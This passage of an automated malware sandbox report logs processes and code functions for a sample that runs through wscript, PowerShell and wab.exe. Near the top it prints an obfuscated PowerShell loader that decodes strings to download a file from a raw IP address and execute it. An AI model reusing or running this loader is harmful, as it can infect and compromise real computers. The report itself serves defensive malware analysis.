M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F000BD pushad ; iretd 2_2_00007FF848F000C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FD5479 push ebp; iretd 2_2_00007FF848FD5538
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07751FB2 push eax; mov dword ptr [esp], ecx5_2_077521B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0775EC6C push FFFFFFE8h; retf 5_2_0775EC71
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08573872 pushfd ; retf 5_2_08573881
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0857386A pushad ; retf 5_2_08573871
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0857369D push ebx; iretd 5_2_085736DA
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240C2806 push ecx; ret 8_2_240C2819
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00451D34 push eax; ret 13_2_00451D41
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00444E71 push ecx; ret 13_2_00444E81
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00414060 push eax; ret 14_2_00414074
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00414060 push eax; ret 14_2_0041409C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00414039 push ecx; ret 14_2_00414049
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_004047CB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
